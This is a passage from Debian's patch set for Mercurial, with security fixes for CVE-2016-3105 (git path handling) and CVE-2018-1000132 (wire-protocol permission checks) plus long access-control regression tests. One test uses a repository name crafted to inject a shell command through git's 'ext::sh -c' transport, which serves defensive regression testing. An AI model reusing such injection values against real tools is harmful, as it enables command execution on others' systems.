TESTFLAGS=--with-hg=/usr/bin/hg". If you're doing it as a user, the testsuite fails because it can't remove it. . This fixes it at least in Debian. I'm unsure about other systems. Bug: http://bz.selenic.com/show_bug.cgi?id=4045 --- a/tests/run-tests.py +++ b/tests/run-tests.py @@ -430,7 +430,7 @@ def usecorrectpython(): sys.executable) mypython = os.path.join(BINDIR, pyexename) try: - if os.readlink(mypython) == sys.executable: + if (mypython == sys.executable) or (os.readlink(mypython) == sys.executable): return os.unlink(mypython) except OSError, err: debian/patches/CVE-2016-3105.patch0000664000000000000000000000512513375256143013245 0ustar # HG changeset patch # User Blake Burkhart # Date 1460001466 18000 # Node ID a56296f55a5e1038ea5016dace2076b693c28a56 # Parent 27ad6cae7785b59f918f5e3ed33a2f1e88a60d4f convert: pass absolute paths to git (SEC) Fixes CVE-2016-3105 (1/1). Previously, it was possible for the repository path passed to git-ls-remote to be misinterpreted as a URL. Always passing an absolute path to git is a simple way to avoid this. diff -r 27ad6cae7785 -r a56296f55a5e hgext/convert/git.py --- a/hgext/convert/git.py Sun May 01 13:52:26 2016 -0500 +++ b/hgext/convert/git.py Wed Apr 06 22:57:46 2016 -0500 @@ -64,6 +64,10 @@ class convert_git(converter_source, commandline): super(convert_git, self).__init__(ui, path, rev=rev) commandline.__init__(self, ui, 'git') + # Pass an absolute path to git to prevent from ever being interpreted + # as a URL + path = os.path.abspath(path) + if os.path.isdir(path + "/.git"): path += "/.git" if not os.path.exists(path + "/objects"): diff -r 27ad6cae7785 -r a56296f55a5e tests/test-convert-git.t --- a/tests/test-convert-git.t Sun May 01 13:52:26 2016 -0500 +++ b/tests/test-convert-git.t Wed Apr 06 22:57:46 2016 -0500 @@ -410,3 +410,21 @@ test for escaping the repo name (CVE-2016-3069) updating bookmarks $ test -f COMMAND-INJECTION [1] + +test for safely passing paths to git (CVE-2016-3105) + + $ git init 'ext::sh -c echo% pwned% >GIT-EXT-COMMAND-INJECTION% #' + Initialized empty Git repository in $TESTTMP/ext::sh -c echo% pwned% >GIT-EXT-COMMAND-INJECTION% #/.git/ + $ cd 'ext::sh -c echo% pwned% >GIT-EXT-COMMAND-INJECTION% #' + $ git commit -q --allow-empty -m 'empty' + $ cd .. + $ hg convert 'ext::sh -c echo% pwned% >GIT-EXT-COMMAND-INJECTION% #' 'converted-git-ext' + initializing destination converted-git-ext repository + scanning source... + sorting... + converting... + 0 empty + updating bookmarks + $ test -f GIT-EXT-COMMAND-INJECTION + [1] + diff -r 27ad6cae7785 -r a56296f55a5e tests/test-convert.t --- a/tests/test-convert.t Sun May 01 13:52:26 2016 -0500 +++ b/tests/test-convert.t Wed Apr 06 22:57:46 2016 -0500 @@ -358,7 +358,7 @@ running from a devel copy, not a temp installation assuming destination emptydir-hg initializing destination emptydir-hg repository emptydir does not look like a CVS checkout - emptydir does not look like a Git repository + $TESTTMP/emptydir does not look like a Git repository emptydir does not look like a Subversion repository emptydir is not a local Mercurial repository emptydir does not look like a darcs repository debian/patches/deb_specific__support_templates_in_fsh.patch0000664000000000000000000000062012261301466021575 0ustar Author: Vernon Tang Description: Support installation of templates in FHS. Forwarded: not-needed --- a/mercurial/templater.py +++ b/mercurial/templater.py @@ -375,7 +375,7 @@ funcs = { # template engine -path = ['templates', '../templates'] +path = ['templates', '../templates', '/usr/share/mercurial/templates'] stringify = templatefilters.stringify def _flatten(thing): debian/patches/CVE-2018-1000132.patch0000664000000000000000000015340413375535170013471 0ustar Description: backport of 4.3 patch to 3.2 This was created from the Mozilla patchset using: something like "hg diff -r db527ae12671 -r 86f9a022ccb8" to generate the original patch, which was then backported. The get-with-headers.py script was taken verbatim from the 4.3 version instead of trying to patch the 3.1 version. Last-update: 2018-06-27 From: Antoine Beaupré Origin: https://hg.mozilla.org/users/gszorc_mozilla.com/hg --- a/hgext/largefiles/uisetup.py +++ b/hgext/largefiles/uisetup.py @@ -11,7 +11,7 @@ from mercurial import archival, cmdutil, commands, extensions, filemerge, hg, \ httppeer, merge, scmutil, sshpeer, wireproto, revset from mercurial.i18n import _ -from mercurial.hgweb import hgweb_mod, webcommands +from mercurial.hgweb import webcommands from mercurial.subrepo import hgsubrepo import overrides @@ -134,9 +134,10 @@ def uisetup(ui): # make putlfile behave the same as push and {get,stat}lfile behave # the same as pull w.r.t. permissions checks - hgweb_mod.perms['putlfile'] = 'push' - hgweb_mod.perms['getlfile'] = 'pull' - hgweb_mod.perms['statlfile'] = 'pull' + wireproto.permissions['putlfile'] = 'push' + wireproto.permissions['getlfile'] = 'pull' + wireproto.permissions['statlfile'] = 'pull' + wireproto.permissions['lheads'] = 'pull' extensions.wrapfunction(webcommands, 'decodepath', overrides.decodepath) --- a/mercurial/hgweb/hgweb_mod.py +++ b/mercurial/hgweb/hgweb_mod.py @@ -7,7 +7,7 @@ # GNU General Public License version 2 or any later version. import os -from mercurial import ui, hg, hook, error, encoding, templater, util, repoview +from mercurial import ui, hg, hook, error, encoding, templater, util, repoview, wireproto from mercurial.templatefilters import websub from mercurial.i18n import _ from common import get_stat, ErrorResponse, permhooks, caching @@ -16,15 +16,8 @@ from common import HTTP_NOT_FOUND, HTTP_SERVER_ERROR from request import wsgirequest import webcommands, protocol, webutil, re -perms = { - 'changegroup': 'pull', - 'changegroupsubset': 'pull', - 'getbundle': 'pull', - 'stream_out': 'pull', - 'listkeys': 'pull', - 'unbundle': 'push', - 'pushkey': 'push', -} +# Aliased for API compatibility. +perms = wireproto.permissions def makebreadcrumb(url, prefix=''): '''Return a 'URL breadcrumb' list @@ -167,8 +160,13 @@ class hgweb(object): try: if query: raise ErrorResponse(HTTP_NOT_FOUND) - if cmd in perms: - self.check_perm(req, perms[cmd]) + + req.checkperm = lambda op: self.check_perm(req, op) + # Assume commands with no defined permissions are writes / + # for pushes. This is the safest from a security perspective + # because it doesn't allow commands with undefined semantics + # from bypassing permissions checks. + req.checkperm(perms.get(cmd, 'push')) return protocol.call(self.repo, req, cmd) except ErrorResponse, inst: # A client that sends unbundle without 100-continue will --- a/mercurial/hgweb/protocol.py +++ b/mercurial/hgweb/protocol.py @@ -17,6 +17,7 @@ class webproto(object): self.req = req self.response = '' self.ui = ui + self.checkperm = req.checkperm def getargs(self, args): knownargs = self._args() data = {} --- a/mercurial/wireproto.py +++ b/mercurial/wireproto.py @@ -11,6 +11,10 @@ from node import bin, hex import changegroup as changegroupmod import peer, error, encoding, util, store +# Maps wire protocol name to operation type. This is used for permissions +# checking. +permissions = {} + # abstract batching support class future(object): @@ -363,6 +367,15 @@ def options(cmd, keys, others): % (cmd, ",".join(others))) return opts +def wireprotocommand(name, args=''): + """decorator for wire protocol command""" + def register(func): + commands[name] = (func, args) + return func + return register + +# TODO define a more appropriate permissions type to use for this. +permissions['batch'] = 'pull' def batch(repo, proto, cmds, others): repo = repo.filtered("served") res = [] @@ -374,6 +387,17 @@ def batch(repo, proto, cmds, others): n, v = a.split('=') vals[n] = unescapearg(v) func, spec = commands[op] + + # If the protocol supports permissions checking, perform that + # checking on each batched command. + # TODO formalize permission checking as part of protocol interface. + if util.safehasattr(proto, 'checkperm'): + # Assume commands with no defined permissions are writes / for + # pushes. This is the safest from a security perspective because + # it doesn't allow commands with undefined semantics from + # bypassing permissions checks. + proto.checkperm(permissions.get(op, 'push')) + if spec: keys = spec.split() data = {} @@ -394,6 +418,7 @@ def batch(repo, proto, cmds, others): res.append(escapearg(result)) return ';'.join(res) +permissions['between'] = 'pull' def between(repo, proto, pairs): pairs = [decodelist(p, '-') for p in pairs.split(" ")] r = [] @@ -401,6 +426,7 @@ def between(repo, proto, pairs): r.append(encodelist(b) + "\n") return "".join(r) +permissions['branchmap'] = 'pull' def branchmap(repo, proto): branchmap = repo.branchmap() heads = [] @@ -410,6 +436,7 @@ def branchmap(repo, proto): heads.append('%s %s' % (branchname, branchnodes)) return '\n'.join(heads) +permissions['branches'] = 'pull' def branches(repo, proto, nodes): nodes = decodelist(nodes) r = [] @@ -417,6 +444,7 @@ def branches(repo, proto, nodes): r.append(encodelist(b) + "\n") return "".join(r) +permissions['capabilities'] = 'pull' def capabilities(repo, proto): caps = ('lookup changegroupsubset branchmap pushkey known getbundle ' 'unbundlehash batch').split() @@ -434,22 +462,26 @@ def capabilities(repo, proto): caps.append('httpheader=1024') return ' '.join(caps) +permissions['changegroup'] = 'pull' def changegroup(repo, proto, roots): nodes = decodelist(roots) cg = repo.changegroup(nodes, 'serve') return streamres(proto.groupchunks(cg)) +permissions['changegroupsubset'] = 'pull' def changegroupsubset(repo, proto, bases, heads): bases = decodelist(bases) heads = decodelist(heads) cg = repo.changegroupsubset(bases, heads, 'serve') return streamres(proto.groupchunks(cg)) +permissions['debugwireargs'] = 'pull' def debugwireargs(repo, proto, one, two, others): # only accept optional args from the known set opts = options('debugwireargs', ['three', 'four'], others) return repo.debugwireargs(one, two, **opts) +permissions['getbundle'] = 'pull' def getbundle(repo, proto, others): opts = options('getbundle', ['heads', 'common', 'bundlecaps'], others) for k, v in opts.iteritems(): @@ -460,10 +492,12 @@ def getbundle(repo, proto, others): cg = repo.getbundle('serve', **opts) return streamres(proto.groupchunks(cg)) +permissions['heads'] = 'pull' def heads(repo, proto): h = repo.heads() return encodelist(h) + "\n" +permissions['hello'] = 'pull' def hello(repo, proto): '''the hello command returns a set of lines describing various interesting things about the server, in an RFC822-like format. @@ -474,12 +508,14 @@ def hello(repo, proto): ''' return "capabilities: %s\n" % (capabilities(repo, proto)) +permissions['listkeys'] = 'pull' def listkeys(repo, proto, namespace): d = repo.listkeys(encoding.tolocal(namespace)).items() t = '\n'.join(['%s\t%s' % (encoding.fromlocal(k), encoding.fromlocal(v)) for k, v in d]) return t +permissions['lookup'] = 'pull' def lookup(repo, proto, key): try: k = encoding.tolocal(key) @@ -491,9 +527,11 @@ def lookup(repo, proto, key): success = 0 return "%s %s\n" % (success, r) +permissions['known'] = 'pull' def known(repo, proto, nodes, others): return ''.join(b and "1" or "0" for b in repo.known(decodelist(nodes))) +permissions['pushkey'] = 'push' def pushkey(repo, proto, namespace, key, old, new): # compatibility with pre-1.8 clients which were accidentally # sending raw binary nodes rather than utf-8-encoded hex @@ -532,6 +570,7 @@ def _walkstreamfiles(repo): # this is it's own function so extensions can override it return repo.store.walk() +permissions['stream_out'] = 'pull' def stream(repo, proto): '''If the server supports streaming clone, it advertises the "stream" capability with a value representing the version and flags of the repo @@ -598,6 +637,7 @@ def stream(repo, proto): return streamres(streamer(repo, entries, total_bytes)) +permissions['unbundle'] = 'push' def unbundle(repo, proto, heads): their_heads = decodelist(heads) --- a/tests/get-with-headers.py +++ b/tests/get-with-headers.py @@ -3,6 +3,7 @@ """This does HTTP GET requests given a host:port and path and returns a subset of the headers plus the body of the result.""" +import argparse import httplib, sys try: @@ -12,16 +13,29 @@ try: except ImportError: pass -twice = False -if '--twice' in sys.argv: - sys.argv.remove('--twice') - twice = True -headeronly = False -if '--headeronly' in sys.argv: - sys.argv.remove('--headeronly') - headeronly = True +stdout = getattr(sys.stdout, 'buffer', sys.stdout) -reasons = {'Not modified': 'Not Modified'} # python 2.4 +parser = argparse.ArgumentParser() +parser.add_argument('--twice', action='store_true') +parser.add_argument('--headeronly', action='store_true') +parser.add_argument('--json', action='store_true') +parser.add_argument('--hgproto') +parser.add_argument('--requestheader', nargs='*', default=[], + help='Send an additional HTTP request header. Argument ' + 'value is
=') +parser.add_argument('--bodyfile', + help='Write HTTP response body to a file') +parser.add_argument('host') +parser.add_argument('path') +parser.add_argument('show', nargs='*') + +args = parser.parse_args() + +twice = args.twice +headeronly = args.headeronly +formatjson = args.json +hgproto = args.hgproto +requestheaders = args.requestheader tag = None def request(host, path, show): @@ -30,31 +44,58 @@ def request(host, path, show): headers = {} if tag: headers['If-None-Match'] = tag + if hgproto: + headers['X-HgProto-1'] = hgproto + + for header in requestheaders: + key, value = header.split('=', 1) + headers[key] = value conn = httplib.HTTPConnection(host) conn.request("GET", '/' + path, None, headers) response = conn.getresponse() - print response.status, reasons.get(response.reason, response.reason) + stdout.write(b'%d %s\n' % (response.status, + response.reason.encode('ascii'))) if show[:1] == ['-']: show = sorted(h for h, v in response.getheaders() if h.lower() not in show) for h in [h.lower() for h in show]: if response.getheader(h, None) is not None: - print "%s: %s" % (h, response.getheader(h)) + stdout.write(b"%s: %s\n" % (h.encode('ascii'), + response.getheader(h).encode('ascii'))) if not headeronly: - print - if response.status != 500: - data = response.read() - sys.stdout.write(data) + stdout.write(b'\n') + data = response.read() + + if args.bodyfile: + bodyfh = open(args.bodyfile, 'wb') + else: + bodyfh = stdout + + # Pretty print JSON. This also has the beneficial side-effect + # of verifying emitted JSON is well-formed. + if formatjson: + # json.dumps() will print trailing newlines. Eliminate them + # to make tests easier to write. + data = json.loads(data) + lines = json.dumps(data, sort_keys=True, indent=2).splitlines() + for line in sorted(lines): + bodyfh.write(line.rstrip()) + bodyfh.write(b'\n') + else: + bodyfh.write(data) + + if args.bodyfile: + bodyfh.close() - if twice and response.getheader('ETag', None): - tag = response.getheader('ETag') + if twice and response.getheader('ETag', None): + tag = response.getheader('ETag') return response.status -status = request(sys.argv[1], sys.argv[2], sys.argv[3:]) +status = request(args.host, args.path, args.show) if twice: - status = request(sys.argv[1], sys.argv[2], sys.argv[3:]) + status = request(args.host, args.path, args.show) if 200 <= status <= 305: sys.exit(0) --- a/tests/run-tests.py +++ b/tests/run-tests.py @@ -364,6 +364,7 @@ def createenv(options, testtmp, threadtmp, port): env["HGPORT"] = str(port) env["HGPORT1"] = str(port + 1) env["HGPORT2"] = str(port + 2) + env["LOCALIP"] = "127.0.0.1" env["HGRCPATH"] = os.path.join(threadtmp, '.hgrc') env["DAEMON_PIDS"] = os.path.join(threadtmp, 'daemon.pids') env["HGEDITOR"] = sys.executable + ' -c "import sys; sys.exit(0)"' --- /dev/null +++ b/tests/test-http-permissions.t @@ -0,0 +1,1499 @@ +#require killdaemons + + $ cat > fakeremoteuser.py << EOF + > import os + > from mercurial.hgweb import hgweb_mod + > from mercurial import wireproto + > class testenvhgweb(hgweb_mod.hgweb): + > def __call__(self, env, respond): + > # Allow REMOTE_USER to define authenticated user. + > if r'REMOTE_USER' in os.environ: + > env[r'REMOTE_USER'] = os.environ[r'REMOTE_USER'] + > # Allow REQUEST_METHOD to override HTTP method + > if r'REQUEST_METHOD' in os.environ: + > env[r'REQUEST_METHOD'] = os.environ[r'REQUEST_METHOD'] + > return super(testenvhgweb, self).__call__(env, respond) + > hgweb_mod.hgweb = testenvhgweb + > + > @wireproto.wireprotocommand('customreadnoperm') + > def customread(repo, proto): + > return b'read-only command no defined permissions\n' + > @wireproto.wireprotocommand('customwritenoperm') + > def customwritenoperm(repo, proto): + > return b'write command no defined permissions\n' + > wireproto.permissions['customreadwithperm'] = 'pull' + > @wireproto.wireprotocommand('customreadwithperm') + > def customreadwithperm(repo, proto): + > return b'read-only command w/ defined permissions\n' + > wireproto.permissions['customwritewithperm'] = 'push' + > @wireproto.wireprotocommand('customwritewithperm') + > def customwritewithperm(repo, proto): + > return b'write command w/ defined permissions\n' + > EOF + + $ cat >> $HGRCPATH << EOF + > [extensions] + > fakeremoteuser = $TESTTMP/fakeremoteuser.py + > strip = + > EOF + + $ hg init test + $ cd test + $ echo a > a + $ hg ci -Ama + adding a + $ cd .. + $ hg clone test test2 + updating to branch default + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ cd test2 + $ echo a >> a + $ hg ci -mb + $ hg book bm -r 0 + $ cd ../test + +web.deny_read=* prevents access to wire protocol for all users + + $ cat > .hg/hgrc < [web] + > deny_read = * + > EOF + + $ hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=capabilities' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=stream_out' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=listkeys' --requestheader 'x-hgarg-1=namespace=phases' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=listkeys+namespace%3Dphases' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadnoperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadwithperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ hg --cwd ../test2 pull http://localhost:$HGPORT/ + abort: authorization failed + [255] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.deny_read=* with REMOTE_USER set still locks out clients + + $ REMOTE_USER=authed_user hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=capabilities' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=stream_out' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=listkeys+namespace%3Dphases' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadnoperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadwithperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ hg --cwd ../test2 pull http://localhost:$HGPORT/ + abort: authorization failed + [255] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.deny_read= denies access to unauthenticated user + + $ cat > .hg/hgrc < [web] + > deny_read = baduser1,baduser2 + > EOF + + $ hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=listkeys' --requestheader 'x-hgarg-1=namespace=phases' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=listkeys+namespace%3Dphases' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadnoperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadwithperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ hg --cwd ../test2 pull http://localhost:$HGPORT/ + abort: authorization failed + [255] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.deny_read= denies access to users in deny list + + $ REMOTE_USER=baduser2 hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=listkeys' --requestheader 'x-hgarg-1=namespace=phases' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=listkeys+namespace%3Dphases' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadnoperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadwithperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ hg --cwd ../test2 pull http://localhost:$HGPORT/ + abort: authorization failed + [255] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.deny_read= allows access to authenticated users not in list + + $ REMOTE_USER=gooduser hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=listkeys' --requestheader 'x-hgarg-1=namespace=phases' + 200 Script output follows + + cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b 1 + publishing True (no-eol) + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=listkeys+namespace%3Dphases' + 200 Script output follows + + cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b 1 + publishing True (no-eol) + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadnoperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadwithperm' + 200 Script output follows + + read-only command w/ defined permissions + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ hg --cwd ../test2 pull http://localhost:$HGPORT/ + pulling from http://localhost:$HGPORT/ + searching for changes + no changes found + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.allow_read=* allows reads for unauthenticated users + + $ cat > .hg/hgrc < [web] + > allow_read = * + > EOF + + $ hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=listkeys' --requestheader 'x-hgarg-1=namespace=phases' + 200 Script output follows + + cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b 1 + publishing True (no-eol) + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=listkeys+namespace%3Dphases' + 200 Script output follows + + cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b 1 + publishing True (no-eol) + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadnoperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadwithperm' + 200 Script output follows + + read-only command w/ defined permissions + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ hg --cwd ../test2 pull http://localhost:$HGPORT/ + pulling from http://localhost:$HGPORT/ + searching for changes + no changes found + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.allow_read=* allows read for authenticated user + + $ REMOTE_USER=authed_user hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=listkeys' --requestheader 'x-hgarg-1=namespace=phases' + 200 Script output follows + + cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b 1 + publishing True (no-eol) + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=listkeys+namespace%3Dphases' + 200 Script output follows + + cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b 1 + publishing True (no-eol) + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadnoperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadwithperm' + 200 Script output follows + + read-only command w/ defined permissions + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ hg --cwd ../test2 pull http://localhost:$HGPORT/ + pulling from http://localhost:$HGPORT/ + searching for changes + no changes found + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.allow_read= does not allow unauthenticated users to read + + $ cat > .hg/hgrc < [web] + > allow_read = gooduser + > EOF + + $ hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=listkeys' --requestheader 'x-hgarg-1=namespace=phases' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=listkeys+namespace%3Dphases' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadnoperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadwithperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ hg --cwd ../test2 pull http://localhost:$HGPORT/ + abort: authorization failed + [255] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.allow_read= does not allow user not in list to read + + $ REMOTE_USER=baduser hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=listkeys' --requestheader 'x-hgarg-1=namespace=phases' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=listkeys+namespace%3Dphases' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadnoperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadwithperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ hg --cwd ../test2 pull http://localhost:$HGPORT/ + abort: authorization failed + [255] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.allow_read= allows read from user in list + + $ REMOTE_USER=gooduser hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=listkeys' --requestheader 'x-hgarg-1=namespace=phases' + 200 Script output follows + + cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b 1 + publishing True (no-eol) + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=listkeys+namespace%3Dphases' + 200 Script output follows + + cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b 1 + publishing True (no-eol) + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadnoperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadwithperm' + 200 Script output follows + + read-only command w/ defined permissions + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ hg --cwd ../test2 pull http://localhost:$HGPORT/ + pulling from http://localhost:$HGPORT/ + searching for changes + no changes found + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.deny_read takes precedence over web.allow_read + + $ cat > .hg/hgrc < [web] + > allow_read = 